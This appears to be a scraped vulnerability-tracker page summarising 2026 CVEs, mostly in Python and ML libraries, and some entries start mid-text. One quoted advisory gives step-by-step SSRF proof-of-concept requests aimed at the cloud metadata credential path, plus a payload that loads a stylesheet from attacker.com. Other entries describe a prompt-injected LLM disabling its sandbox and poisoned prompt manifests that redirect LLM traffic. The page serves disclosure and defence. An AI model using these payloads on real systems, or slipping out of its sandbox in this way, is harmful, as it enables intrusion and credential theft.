Privilege escalation in wger fitness manager allows gym trainers to impersonate gym managers via session-chain attack. An authenticated trainer exploits flawed session-flag logic in the trainer-login endpoint to bypass permission checks - first switching into a low-privilege user, then leveraging the inherited 'trainer.identity' session flag to hop into manager accounts. Publicly available proof-of-concept demonstrates complete takeover of gym administration with CVSS 8.1 (network-accessible, low complexity). No vendor patch confirmed at time of analysis; vulnerability actively disclosed by wger-project GitHub advisory GHSA-9qpr-vc49-hqg2. EPSS score not available, not in CISA KEV. Root cause is CWE-269 (improper privilege management) in core/views/user.py lines 169-178.

Privilege Escalation Python
NVD GitHub
CVSS 3.1
8.1
EPSS
0.0%
CVE-2026-43977 PyPI HIGH GHSA This Week

{id}/logs/ and /api/v2/routine/{id}/stats/ endpoints. Detailed proof-of-concept with Python exploit confirms trivial exploitation against wger <= 2.5.0a2. CVSS 7.5 rates this High severity, but NOTE: vector PR:N appears inconsistent with authenticated-only access described - attackers need valid credentials, suggesting actual vector should be PR:L. EPSS data not available. No CVE KEV listing or public exploit repositories identified beyond GitHub advisory disclosure. Patch status unconfirmed - GitHub advisory references fix commit but no released version number provided in available data.

Authentication Bypass Python Information Disclosure
NVD GitHub
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-45136 npm HIGH PATCH GHSA This Week

Local code execution in the claude-code-cache-fix npm package (v3.5.0 and v3.5.1) lets attacker-controlled filesystem path names run arbitrary Python inside a victim's Claude Code process. The bundled tools/quota-statusline.sh interpolates Claude Code's statusline hook stdin — which reflects user-controlled paths such as cwd, workspace.current_dir, workspace.project_dir, and transcript_path — directly into a Python triple-quoted literal, so a directory name containing the byte sequence ''' closes the literal early and executes following bytes as Python at the user's privilege on every statusline redraw. A working injection payload is publicly available exploit code (published in the GHSA advisory and the T6/T7 regression tests); the issue is not listed in CISA KEV and no EPSS score was provided.

Python Node.js Command Injection RCE
NVD GitHub
CVSS 4.0
8.6
EPSS
0.0%
CVE-2026-45134 LIB HIGH PATCH GHSA This Week

Unsafe deserialization in LangSmith SDK's prompt pull methods allows remote attackers to execute server-side request forgery (SSRF) and redirect LLM traffic to attacker-controlled infrastructure when applications pull public prompts from LangSmith Hub. The SDK deserializes untrusted prompt manifests containing serialized LangChain objects with attacker-controlled constructor arguments, including malicious base_url configurations, custom headers, and secret references. Exploitation requires user interaction (developers must call pull_prompt with a malicious owner/name identifier), but no authentication is required to publish malicious prompts to the public Hub. Vendor-released patches in Python >= 0.8.0 and JS/TS >= 0.6.0 now block public prompt pulling by default, requiring explicit opt-in via dangerously_pull_public_prompt flag. EPSS data not available; no CISA KEV listing or public exploit identified at time of analysis.

Python SSRF Deserialization Suse
NVD GitHub
CVSS 3.1
7.1
EPSS
0.0%
CVE-2026-44681 PyPI MEDIUM PATCH GHSA This Month

Unauthenticated open redirect in Authlib's OpenIDImplicitGrant and OpenIDHybridGrant authorization endpoints allows remote attackers to redirect users to attacker-controlled URLs by submitting authorization requests that omit the openid scope. The vulnerability occurs because scope validation happens before redirect_uri validation, allowing the error handler to return an HTTP 302 with an unvalidated attacker-supplied redirect_uri. A proof-of-concept GET request demonstrates the flaw trivially; no authentication, valid client_id, or user interaction beyond clicking the link is required, though the CVSS score of 6.1 reflects the requirement for user interaction (UI:R) to click the phishing link. Actively exploited in the wild (KEV status), this is a Medium-severity open redirect enabling credential harvesting attacks.

Python CSRF Open Redirect
NVD GitHub VulDB
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-44660 PyPI HIGH PATCH GHSA This Week

{"x": "A" * 200000} def run(): try: ujson.dump(obj, BadFile()) except RuntimeError: pass run() tracemalloc.start() gc.collect() base = tracemalloc.get_traced_memory()[0] for i in range(5): run() gc.collect() cur = tracemalloc.get_traced_memory()[0] print(i, cur - base) ``` Any application that serializes data through `ujson.dump()` to an attacker-influenced file-like object that can fail can be driven into linear memory growth. An attacker can quickly use up all the memory of say a web server that sends JSON responses using `ujson.dump()` by repeatedly making requests then closing the connection mid response. The missing dec-refs were added in 82af1d0ac01d09aa40c887b460d44b9d9f4bccd9. We recommend upgrading to [UltraJSON 5.12.1](https://github.com/ultrajson/ultrajson/releases/tag/5.12.1). Replacing `ujson.dump(obj, file)` with `file.write(ujson.dumps(obj))` is equivalent (contrary to popular misconception, there are no streaming benefits to using `ujson.dump()`) and will avoid the memory leak.

Python Information Disclosure Red Hat
NVD GitHub VulDB
CVSS 4.0
8.7
EPSS
0.0%
CVE-2026-45227 HIGH PATCH This Week

Heym before 0.0.21 contains a sandbox escape vulnerability in the custom Python tool executor that allows authenticated workflow authors to bypass sandbox restrictions by using object-graph introspection primitives. Attackers can use Python introspection techniques to recover the unrestricted __import__ function, import blocked modules such as os and subprocess, and access inherited backend environment variables containing database credentials and encryption keys to execute arbitrary host commands as the backend service user.

Authentication Bypass Python Heym
NVD GitHub
CVSS 4.0
8.7
EPSS
0.0%
CVE-2026-42074 npm CRITICAL PATCH GHSA Act Now

Sandbox escape in OpenClaude (npm package openclaude) versions before 0.5.1 allows a prompt-injected LLM to disable host sandboxing by setting the model-controlled `dangerouslyDisableSandbox: true` flag in any Bash tool_use call, yielding full unsandboxed command execution on the host. CVSS 4.0 scores this 9.3 Critical (AV:N/AC:L/PR:N/UI:N, VC/VI/VA:H); no public exploit identified at time of analysis beyond the reporter's PoC, but the upstream fix has been merged. The flaw is especially severe because it is reachable under default settings (`allowUnsandboxedCommands` defaults to true).

Kubernetes Information Disclosure Authentication Bypass Python RCE +2
NVD GitHub
CVSS 4.0
9.3
EPSS
0.1%
CVE-2026-31235 PyPI CRITICAL GHSA Act Now

Arbitrary code execution in imgaug library (versions through 0.4.0) occurs when the BackgroundAugmenter class deserializes malicious pickle payloads without validation in its multiprocessing worker method. Attackers who can influence queue data-through compromised shared queues, malicious input scripts, or social engineering-can achieve remote or local code execution depending on deployment context. CVSS 9.8 critical severity reflects network-based exploitation without authentication, though EPSS probability is low (0.02%, 6th percentile), indicating limited observed exploitation activity. No CISA KEV listing or public exploit code identified at time of analysis.

Python RCE Deserialization N A
NVD GitHub
CVSS 3.1
9.8
EPSS
0.0%
CVE-2026-31222 PyPI HIGH GHSA This Week

Arbitrary code execution in Snorkel machine learning library (≤v0.10.0) occurs when users load malicious model checkpoint files through the Trainer.load() method. The vulnerability stems from unsafe PyTorch deserialization that processes untrusted Pickle objects without the weights_only security parameter. Attackers can embed malicious Python code in model files distributed through repositories, shared datasets, or social engineering campaigns. Despite the 8.8 CVSS score indicating critical severity, EPSS scoring at 0.06% (19th percentile) suggests very low real-world exploitation probability, and no active exploitation or public proof-of-concept has been identified at time of analysis.

Checkpoint Python RCE Deserialization
NVD GitHub VulDB
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-31223 PyPI HIGH GHSA This Week

Arbitrary code execution in Snorkel library (Python) through version 0.10.0 enables remote attackers to execute code by supplying malicious pickle files to the BaseLabeler.load() method. The vulnerability stems from unsafe deserialization using pickle.load() without input validation, allowing attackers to craft serialized objects that execute arbitrary commands during deserialization. With EPSS at 6th percentile, exploitation probability remains relatively low despite the critical CVSS score, and no active exploitation (KEV) or public proof-of-concept has been identified at time of analysis.

Python RCE Deserialization
NVD GitHub VulDB
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-31237 PyPI CRITICAL GHSA Act Now

Arbitrary code execution in Ludwig framework ≤0.10.4 occurs when attackers supply malicious pickle files to the predict() method, which deserializes untrusted data without validation using pandas.read_pickle(). Remote unauthenticated attackers can achieve full system compromise by exploiting the automatic file format detection mechanism that processes .pkl files through Python's unsafe pickle module. EPSS score of 0.06% (19th percentile) suggests low current exploitation likelihood despite the critical CVSS 9.8 rating, though no public exploit code or active exploitation has been identified at time of analysis.

Python RCE Deserialization N A
NVD GitHub
CVSS 3.1
9.8
EPSS
0.1%
CVE-2026-31236 PyPI CRITICAL GHSA Act Now

Arbitrary code execution occurs in the llm CLI tool (versions through 0.27.1) when attackers social-engineer victims into running crafted commands containing malicious Python code in the --functions argument. The tool directly executes this code via unsafe exec() without sanitization, enabling full system compromise. CVSS 9.8 assigns network attack vector and no authentication, but real-world exploitation requires local command execution by a tricked user, creating a significant disparity between the vector and actual attack prerequisites. EPSS score of 0.02% (5th percentile) suggests minimal automated exploitation risk, and no active exploitation or public POC has been identified at time of analysis.

Python Code Injection RCE N A
NVD GitHub VulDB
CVSS 3.1
9.8
EPSS
0.0%
CVE-2026-31224 PyPI HIGH GHSA This Week

Remote code execution in Snorkel machine learning library (≤v0.10.0) occurs when users load untrusted model files via MultitaskClassifier.load(). The vulnerability exploits insecure Python object deserialization through torch.load(), allowing attackers to embed malicious code in model weight files that executes upon loading. EPSS score of 0.06% (19th percentile) suggests low observed exploitation probability in the wild, though SSVC framework indicates total technical impact once exploited. No public exploit code or active exploitation confirmed at time of analysis, but exploitation requires only that a data scientist or ML engineer load a malicious .pkl model file.

Python RCE Deserialization N A
NVD GitHub
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-31230 CRITICAL Act Now

Command injection in Adversarial Robustness Toolbox (ART) up to version 1.20.1 enables remote code execution through unsafe eval() usage in Kubeflow pipeline components. The robustness_evaluation_fgsm_pytorch.py script directly evaluates user-controlled --clip_values and --input_shape arguments without sanitization, allowing Python code injection. With CVSS 9.8 (AV:N/AC:L/PR:N/UI:N) indicating network-exploitable unauthenticated access, this represents critical risk in automated ML pipeline environments where attackers can control pipeline configurations. EPSS score of 0.02% (5th percentile) suggests low observed exploitation activity, though the attack vector and ML tooling context create significant supply chain risk in CI/CD and research environments.

Python RCE N A
NVD GitHub VulDB
CVSS 3.1
9.8
EPSS
0.0%
CVE-2026-31217 CRITICAL Act Now

Arbitrary code execution in optimate's neural_magic_training.py allows remote attackers to execute Python code by supplying a malicious directory path containing a crafted module.py file. The _load_model() function directly executes file contents via Python's exec() without validation. CVSS 9.8 reflects network vector with no authentication, but EPSS score of 0.02% (5th percentile) indicates very low observed exploitation probability. No active exploitation confirmed (not in CISA KEV). Vulnerability exists in commit a6d302f912b481c94370811af6b11402f51d377f from July 2024. Affects organizations using optimate for neural network model optimization.

Python Code Injection RCE
NVD GitHub VulDB
CVSS 3.1
9.8
EPSS
0.0%
CVE-2026-31225 PyPI HIGH GHSA This Week

Remote code execution in superduper (Python library) through version 0.10.0 allows unauthenticated network attackers to execute arbitrary system commands by submitting malicious query strings with embedded Python code. The _parse_op_part() function in query.py uses unsafe eval() with inadequate context restrictions, enabling attackers to import modules (such as os) and achieve complete server compromise. EPSS score is low (0.07%, 20th percentile) and no active exploitation is confirmed (CISA KEV absent), but SSVC framework rates technical impact as total. User interaction is required (CVSS UI:R), reducing automated exploitation risk. Authentication requirements not confirmed from available data - CVSS vector shows PR:N (no privileges required) but UI:R suggests user-triggered queries.

Python Code Injection RCE
NVD GitHub
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-31228 CRITICAL Act Now

Remote code execution in Adversarial Robustness Toolbox (ART) versions through 1.20.1 allows unauthenticated network attackers to execute arbitrary Python code via unsafe eval() usage in the Kubeflow robustness evaluation component. The vulnerability accepts unsanitized user input for LossFn and Optimizer parameters in PyTorch model evaluations, enabling complete system compromise. With CVSS 9.8 but only 0.06% EPSS score (18th percentile), this represents a severe theoretical risk that has not yet manifested in widespread exploitation. No public exploit code identified at time of analysis, and the vulnerability requires specific deployment of ART's Kubeflow integration component.

Python Code Injection RCE N A
NVD GitHub VulDB
CVSS 3.1
9.8
EPSS
0.1%
CVE-2026-31214 CRITICAL Act Now

Arbitrary code execution via torch-checkpoint-shrink.py script in ml-engineering project allows remote attackers to execute malicious Python code by providing crafted PyTorch checkpoint files. The vulnerability stems from insecure deserialization where torch.load() processes .pt files without the weights_only=True safeguard, enabling pickle-based arbitrary object instantiation. Despite a critical CVSS 9.8 score, EPSS probability is low (0.06%, 19th percentile) and no public exploit or active exploitation is confirmed, suggesting limited real-world targeting to date. SSVC assessment indicates total technical impact with automatable exploitation potential, making this a priority for organizations using ml-engineering scripts in production environments.

Checkpoint Python RCE Deserialization N A
NVD GitHub
CVSS 3.1
9.8
EPSS
0.1%
CVE-2026-31220 PyPI CRITICAL GHSA Act Now

Remote code execution in PySyft Datasite/Server versions 0.9.5 and earlier allows unauthenticated attackers to execute arbitrary Python code on the server through the function submission mechanism. The vulnerability stems from insufficient validation and sandboxing of user-submitted Python functions decorated with @sy.syft_function(), which are executed using unsafe exec() and eval() calls after approval. With an EPSS score of 0.04% and no current KEV listing, this appears to be a high-severity vulnerability without confirmed active exploitation.

Python RCE Code Injection N A
NVD GitHub VulDB
CVSS 3.1
9.8
EPSS
0.0%
CVE-2026-31231 CRITICAL Act Now

Remote code execution in Cognee v0.4.0 and earlier allows unauthenticated attackers to execute arbitrary Python code via the notebook cell execution API endpoint. The vulnerability stems from unsafe use of Python's exec() function without sandboxing or validation, enabling complete system compromise with server process privileges. While not actively exploited (not in KEV), the vulnerability is automatable with total technical impact per SSVC framework, though EPSS indicates low exploitation probability at 0.06%.

Python RCE Code Injection N A
NVD GitHub VulDB
CVSS 3.1
9.8
EPSS
0.1%
CVE-2026-31219 HIGH This Week

Insecure deserialization in Optimate's neural_magic_training.py script enables remote code execution when loading PyTorch model files. The _load_model() function uses torch.load() without the weights_only=True security parameter, allowing attackers with low privileges to execute arbitrary Python code by providing malicious .pt or .pth files via the --model command-line argument. EPSS indicates low exploitation probability at 0.06% with no active exploitation confirmed.

Python RCE Deserialization N A
NVD GitHub VulDB
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-31232 HIGH This Week

The CosyVoice project thru commit 6e01309e01bc93bbeb83bdd996b1182a81aaf11e (2025-30-21) contains an insecure deserialization vulnerability (CWE-502) in its model loading process. When loading model files (.pt) from a user-specified directory (via the --model_dir argument), the code uses torch.load() without the security-restrictive weights_only=True parameter. This allows the deserialization of arbitrary Python objects via the Pickle module. An attacker can exploit this by providing a maliciously crafted model directory containing .pt files with embedded pickle payloads. When a victim loads this directory using CosyVoice's web interface, the malicious payload is executed, leading to remote code execution on the victim's system.

Python RCE Deserialization N A
NVD GitHub
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-31229 CRITICAL Act Now

Remote code execution in Adversarial Robustness Toolbox (ART) through version 1.20.1 allows unauthenticated network attackers to execute arbitrary Python code by uploading malicious PyTorch model files to pipeline-accessible object storage locations. The vulnerability stems from unsafe use of torch.load() without the weights_only=True parameter in the Kubeflow component's model loading process, enabling Pickle deserialization of arbitrary objects. With CVSS 9.8 (AV:N/AC:L/PR:N/UI:N) but only 0.06% EPSS exploitation probability (19th percentile), this represents a critical-severity issue with low observed real-world targeting, likely due to the specialized nature of ML robustness evaluation deployments. No active exploitation confirmed (not in CISA KEV) and no public exploit code identified at time of analysis.

Python RCE Deserialization N A
NVD GitHub
CVSS 3.1
9.8
EPSS
0.1%
CVE-2026-31218 HIGH This Week

Remote code execution in Optimate's neural_magic_training.py script allows authenticated attackers to execute arbitrary code via malicious PyTorch model files. The vulnerability stems from unsafe deserialization when loading model state dictionaries without PyTorch's weights_only=True security flag, enabling pickle-based arbitrary object execution. With an EPSS score of 0.06% and no confirmed exploitation, this represents a moderate risk primarily in environments where users can upload or specify model files.

Python RCE Deserialization N A
NVD GitHub VulDB
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-31221 PyPI HIGH GHSA This Week

Arbitrary code execution occurs in PyTorch Lightning 2.6.0 and earlier when loading malicious checkpoint files. The LightningModule.load_from_checkpoint() method deserializes untrusted Pickle data without security restrictions, allowing attackers to execute arbitrary Python code when victims open crafted .ckpt files. EPSS score of 0.06% (19th percentile) indicates low observed exploitation probability, and no public exploit code or CISA KEV listing exists at time of analysis. Attack requires local access and user interaction (opening a malicious checkpoint), limiting remote attack scenarios to social engineering or supply chain compromise.

Checkpoint Python RCE Deserialization
NVD GitHub VulDB
CVSS 3.1
7.8
EPSS
0.1%
CVE-2026-31239 PyPI CRITICAL GHSA Act Now

Remote code execution in Mamba language model framework (through version 2.2.6) allows unauthenticated attackers to execute arbitrary Python code by publishing malicious models on HuggingFace Hub. When victims call MambaLMHeadModel.from_pretrained() on a weaponized model repository, insecure pickle deserialization executes attacker-controlled code in the context of the victim's process. Despite the critical CVSS 9.8 score and network attack vector requiring no authentication, EPSS probability remains extremely low (0.02%, 5th percentile), suggesting limited real-world exploitation to date. No CISA KEV listing or public POC identified at time of analysis.

Python RCE Deserialization N A
NVD GitHub
CVSS 3.1
9.8
EPSS
0.0%
CVE-2026-31238 PyPI CRITICAL GHSA Act Now

Remote code execution in Ludwig framework ≤0.10.4 allows unauthenticated network attackers to execute arbitrary code by supplying a malicious PyTorch model file to the ludwig serve endpoint. The vulnerability stems from unsafe deserialization in the model loading component, which uses torch.load() without the weights_only=True safety parameter. With CVSS 9.8 (critical network vector, no authentication required) but only 0.02% EPSS, this represents a high-severity issue in vulnerable deployments, though widespread exploitation has not been observed. No CISA KEV listing or public POC identified at time of analysis.

Python RCE Deserialization N A
NVD GitHub
CVSS 3.1
9.8
EPSS
0.0%
CVE-2026-43979 PyPI MEDIUM PATCH GHSA This Month

{title}</title>") # ← title is not escaped if metadata: for key, value in metadata.items(): html_parts.append(f'<meta name="{key}" content="{value}">') # ← key/value are not escaped ``` **Data flow trace:** ``` User input: research.query │ ▼ research_routes.py:1321 pdf_title = research.title or research.query │ ▼ research_routes.py:1325-1326 export_report_to_memory(report_content, format, title=pdf_title) │ ▼ pdf_service.py:107 PDFService.markdown_to_pdf(markdown_content, title=pdf_title) │ ▼ pdf_service.py:137 _markdown_to_html(markdown_content, title, metadata) │ ▼ pdf_service.py:172 f"<title>{title}</title>" ← injection point, no escaping │ ▼ pdf_service.py:112 HTML(string=html_content) ← WeasyPrint renders the injected HTML ``` `research.query` is a string submitted by the user via `POST /api/start_research`, stored as-is in the database, and retrieved without any sanitization. When the user triggers `POST /api/v1/research/<research_id>/export/pdf`, this value is embedded unescaped into the HTML document processed by WeasyPrint. **Injection point 1: `<title>` tag breakout** ``` Input: </title><img src="http://169.254.169.254/latest/meta-data/" /> Rendered: <title></title><img src="http://169.254.169.254/latest/meta-data/" /></title> ``` When WeasyPrint encounters the injected `<img>` tag, it issues an HTTP GET request to the value of `src` by default. **Injection point 2: `<meta>` attribute breakout** ``` Input: " /><link rel="stylesheet" href="http://attacker.com/evil.css Rendered: <meta name="..." content="" /><link rel="stylesheet" href="http://attacker.com/evil.css"> ``` WeasyPrint will fetch and apply the external stylesheet, which also constitutes SSRF. --- **Step 1: Log in and submit a research query containing the injection payload** ```http POST /api/start_research HTTP/1.1 Host: localhost:5000 Content-Type: application/json Cookie: session=<valid_session> { "query": "</title><img src=\"http://169.254.169.254/latest/meta-data/iam/security-credentials/\" onerror=\"x\"/>", "mode": "quick", "model_provider": "OLLAMA", "model": "llama3" } ``` The response returns a `research_id`, e.g. `"aaaa-bbbb-cccc-dddd"`. **Step 2: After the research completes, trigger PDF export** ```http POST /api/v1/research/aaaa-bbbb-cccc-dddd/export/pdf HTTP/1.1 Host: localhost:5000 Cookie: session=<valid_session> X-CSRFToken: <csrf_token> ``` **Step 3: Intermediate HTML constructed server-side** ```html <!DOCTYPE html><html><head> <meta charset="utf-8"> <title></title><img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" onerror="x"/></title> </head><body> ...report content... </body></html> ``` **Step 4: WeasyPrint issues an outbound HTTP request to the injected URL** Observed in network monitoring (e.g. `tcpdump`) or the target internal service logs: ``` GET /latest/meta-data/iam/security-credentials/ HTTP/1.1 Host: 169.254.169.254 User-Agent: WeasyPrint/... ``` **Lightweight verification (no SSRF environment required):** Set the query to: ``` </title><title>INJECTED ``` The resulting HTML will contain two `<title>` tags and the PDF document metadata title will read `INJECTED`, confirming successful injection. --- By injecting `<img src>`, `<link href>`, or `<style>@import url()` tags pointing to internal addresses, WeasyPrint will issue HTTP requests on behalf of the server during PDF generation. This allows access to: - **Cloud metadata services** (`169.254.169.254`) on AWS, GCP, or Azure - enabling theft of IAM credentials and instance identity documents. - **Internal network services** (`192.168.x.x`, `10.x.x.x`) - enabling reconnaissance and interaction with internal APIs not exposed to the internet. - **Localhost administrative interfaces** - if SSRF protections are only applied at the user-input validation layer. This is an effective bypass of the application's existing SSRF defenses in `ssrf_validator.py`, because WeasyPrint's outbound resource requests are never routed through that validator. Injected tags can prematurely close `<head>` and insert arbitrary content into `<body>`, causing WeasyPrint to render incorrectly or crash, resulting in a Denial of Service (DoS) condition for the export functionality. By injecting `<link>` or `<style>` tags that load external stylesheets, an attacker can fully control the visual content of the generated PDF, enabling report content forgery or spoofing. - All PDF export operations are affected. - The vulnerability is reachable by any authenticated user - no elevated privileges required. - Because each user operates against their own encrypted database, cross-user exploitation is not possible. However, on any shared or multi-tenant deployment, every authenticated user can independently trigger this vulnerability. --- Apply `html.escape()` to all user-controlled values before embedding them in the HTML template inside `_markdown_to_html`: ```python import html if title: html_parts.append(f"<title>{html.escape(title)}</title>") if metadata: for key, value in metadata.items(): html_parts.append( f'<meta name="{html.escape(str(key))}" content="{html.escape(str(value))}">' ) ``` Additionally, consider configuring WeasyPrint with a custom `url_fetcher` that blocks or restricts outbound HTTP requests to prevent SSRF via injected or legitimately-embedded external resources: ```python def safe_url_fetcher(url, timeout=10): from ssrf_validator import validate_url if not validate_url(url): raise ValueError(f"Blocked unsafe URL in PDF rendering: {url}") return weasyprint.default_url_fetcher(url, timeout=timeout) html_doc = HTML(string=html_content, url_fetcher=safe_url_fetcher) ``` --- *Report generated against commit `f3540fb3` - local-deep-research, branch `main`.* --- Thanks @Firebasky for the detailed report. The complete remediation spans two PRs, both merged to `main`: **#3082** (merged 2026-03-29, shipped in **v1.5.0+**) - closes the HTML-injection sinks: - `html.escape()` now wraps the `title` value in `<title>…</title>` - Same for metadata keys/values in `<meta name="…" content="…">` - Regression tests added in `tests/web/services/test_pdf_service.py` **#3613** (merged 2026-04-24, shipped in **v1.6.0**) - implements the `url_fetcher` recommendation from the Remediation section: - New `_safe_url_fetcher` in `pdf_service.py` delegates to `weasyprint.default_url_fetcher` only after `security.ssrf_validator.validate_url` accepts the URL - Blocks AWS metadata (169.254.169.254), RFC1918, loopback, and non-http(s) schemes - Covers the chained SSRF path through any URL reaching the rendered HTML - markdown body, citations, raw-HTML passthrough via Python-Markdown - Blocked URLs raise `UnsafePDFResourceURLError` (a `ValueError` subclass) so WeasyPrint skips the resource and the render continues - 8 regression tests, including an end-to-end render with `<img src="http://169.254.169.254/…">` embedded in the body **Advisory metadata:** CVSS `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N` (5.0 Moderate), CWEs **CWE-79** + **CWE-918**. **Patched in v1.6.0** - upgrade to v1.6.0 or later to receive both fixes.

Denial Of Service SSRF Microsoft XSS Python
NVD GitHub VulDB
CVSS 3.1
5.0
EPSS
0.0%
CVE-2026-42857 MEDIUM This Month

Stored cross-site scripting (XSS) via CSS injection in Open edX Platform allows enrolled students to inject arbitrary CSS into discussion notification emails sent to other users by bypassing insufficient HTML sanitization in the clean_thread_html_body() function. The vulnerability affects all versions prior to the fix commit and enables email tracking through malicious stylesheets, content spoofing, and phishing attacks against recipients who view notification emails.

XSS Python
NVD GitHub
CVSS 3.1
4.6
EPSS
0.0%
CVE-2026-45061 npm HIGH PATCH GHSA This Week

Server-Side Request Forgery in Budibase self-hosted instances allows authenticated Global Builder users to bypass SSRF protections via trivial substring manipulation in plugin URL uploads. The vulnerability exploits a flawed validation check that accepts any URL containing '.tar.gz' anywhere in the string, enabling requests to internal cloud metadata services (AWS IMDS at 169.254.169.254), CouchDB, Redis, and private network ranges when chained with the BLACKLIST_IPS bypass (CVE-2026-45060) or via HTTP redirect chains. CVSS 7.7 (High) with Changed Scope indicates cross-boundary impact from application to infrastructure layer. Vendor-released patch available in version 3.35.10 per GitHub security advisory GHSA-xh5j-727m-w6gg. EPSS data not available; no CISA KEV listing at time of analysis. Publicly available exploit code exists in researcher's GitHub repository with Docker-based proof-of-concept.

Redis SSRF Microsoft Open Redirect Python +1
NVD GitHub
CVSS 3.1
7.7
EPSS
0.0%
CVE-2026-45017 PyPI HIGH PATCH GHSA This Week

{% include %} and {% render %} Liquid tags. The built-in FileSystemLoader and CachingFileSystemLoader failed to reject absolute paths, escaping the configured search path; no public exploit identified at time of analysis but the vendor advisory (GHSA-8p4x-wr7x-3788) publicly documents the bypass mechanism.

Python Path Traversal
NVD GitHub
CVSS 4.0
8.2
EPSS
0.1%
CVE-2026-44971 PyPI HIGH GHSA This Week

Server-side request forgery (SSRF) in GuardDog 1.0.0 through 2.9.0 allows remote attackers to exfiltrate GitHub personal access tokens and probe internal networks via malicious repository URLs. The vulnerability stems from blind string replacement in ProjectScanner.scan_remote() that fails to validate hostnames before appending authentication credentials. No vendor-released patch identified at time of analysis. Publicly available exploit code exists via GitHub advisory reproduction steps. CVSS 8.2 (High) with network vector and no authentication required.

Python SSRF
NVD GitHub VulDB
CVSS 3.1
8.2
EPSS
0.0%
CVE-2026-44972 PyPI MEDIUM GHSA This Month

GuardDog versions 2.6.0 through 2.9.0 fail to escape terminal control characters in human-readable scan output, allowing malicious packages to inject ANSI or OSC escape sequences that can clear analyst terminals, rewrite CI logs, or inject spoofed content. The vulnerability affects file paths, code snippets, and messages parsed from package content and rendered directly to stdout without sanitization. Remote attackers can exploit this by distributing packages with specially crafted filenames or source code containing escape sequences, and requires only user interaction (running the scanner on the malicious package).

Python Code Injection
NVD GitHub
CVSS 3.1
5.0
EPSS
0.0%
CVE-2026-7820 PyPI MEDIUM PATCH This Month

pgAdmin 4 before version 9.15 allows unauthenticated attackers to bypass account lockout and perform unbounded password-guessing attacks against INTERNAL authentication accounts by exploiting Flask-Security's default /login endpoint, which does not enforce the locked column that the custom /authenticate/login view relies on for brute-force protection. The vulnerability affects only accounts using pgAdmin's INTERNAL authentication source; LDAP, OAuth2, Kerberos, and Webserver authentication methods are not vulnerable because they do not use local passwords.

Authentication Bypass Python
NVD GitHub
CVSS 4.0
6.9
EPSS
0.0%
CVE-2026-7818 PyPI HIGH PATCH GHSA This Week

Unsafe Python pickle deserialization in pgAdmin 4 FileBackedSessionManager allows authenticated local users with session-directory write access to execute arbitrary code as the pgAdmin process. The vulnerability arises from deserializing session files before validating their HMAC signature, enabling payload injection through crafted pickle objects. Attackers require both valid authentication and filesystem write permission to the sessions directory-achievable through misconfiguration or chaining with a separate path-traversal vulnerability. EPSS exploitation probability and KEV status not provided; no public exploit code identified at time of analysis. PostgreSQL maintainers confirmed the flaw and patched it in version 9.15 by implementing pre-deserialization HMAC validation.

Python RCE Deserialization
NVD GitHub VulDB
CVSS 4.0
7.3
EPSS
0.3%
CVE-2026-44346 PyPI HIGH PATCH GHSA This Week

Command injection in BentoML 1.4.38 and earlier allows attackers to execute arbitrary code on build hosts when victims containerize malicious bentos. Exploitation occurs during the `bentoml containerize` workflow when unvalidated `envs[*].name` and `docker.base_image` fields from imported bentofile.yaml are interpolated into generated Dockerfiles without escaping, enabling newline-injection of RUN directives executed by `docker build`. This is a sibling vulnerability to CVE-2026-33744 and CVE-2026-35043 which patched the same injection class in `system_packages` fields but left these additional attack surfaces unaddressed. Patch version 1.4.39 available from vendor. No CISA KEV listing or public POC outside gated HuggingFace repository at time of analysis, but end-to-end reproduction confirmed by reporter on BentoML 1.4.38.

Python Docker Command Injection
NVD GitHub
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-44345 PyPI HIGH PATCH GHSA This Week

Command injection in BentoML allows arbitrary code execution on developer workstations during containerization of untrusted bento packages. Attackers craft malicious bento.yaml files with newline-injected docker.base_image values that smuggle Dockerfile RUN directives into the generated Dockerfile template. When victims run 'bentoml containerize' on the malicious bento, Docker build executes the injected commands on the host system with full developer privileges. This vulnerability (GHSA-78f9-r8mh-4xm2) is part of a documented cluster alongside GHSA-w2pm-x38x-jp44, CVE-2026-33744, and CVE-2026-35043, all involving unsafe Jinja2 template interpolation in BentoML's Dockerfile generation pipeline. Fixed in version 1.4.39. No active exploitation confirmed at time of analysis; EPSS data not available for 2026-dated CVE.

Python Docker Command Injection
NVD GitHub
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-44985 Go HIGH GHSA This Week

Cross-Site WebSocket Hijacking (CSWSH) in Dozzle's /exec and /attach endpoints allows authenticated shell access bypass when --enable-shell is enabled. The vulnerability stems from WebSocket origin validation bypass (CheckOrigin returns true) combined with SameSite=Lax JWT cookies, enabling attackers on same-site origins (sibling subdomains or localhost services) to hijack victim WebSocket sessions and execute arbitrary commands in Docker containers. Affects all Dozzle deployments through version 10.5.1 with shell access enabled. No public exploit identified at time of analysis, but detailed proof-of-concept exists in the GitHub advisory demonstrating container shell access via Python script. CVSS score not assigned, but CWE-346 classification indicates origin validation failure.

Python Docker RCE
NVD GitHub VulDB
CVSS 4.0
8.7
EPSS
0.0%
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Remote code execution in Hugging Face diffusers (Python package, versions < 0.38.0) is achievable via a TOCTOU race between two sequential Hub downloads inside DiffusionPipeline.from_pretrained, letting a malicious repo owner bypass the trust_remote_code guard and silently execute arbitrary Python during model loading. Exploitation requires user interaction (loading a malicious repo without pinning a revision) and high attack complexity due to a sub-second race window, but no public exploit beyond the reporter's PoC is identified at time of analysis. Affected users running diffusers <0.38.0 should upgrade to 0.38.0 where the issue is fixed.

Python RCE
NVD GitHub
EPSS 0% CVSS 4.3
MEDIUM PATCH This Month

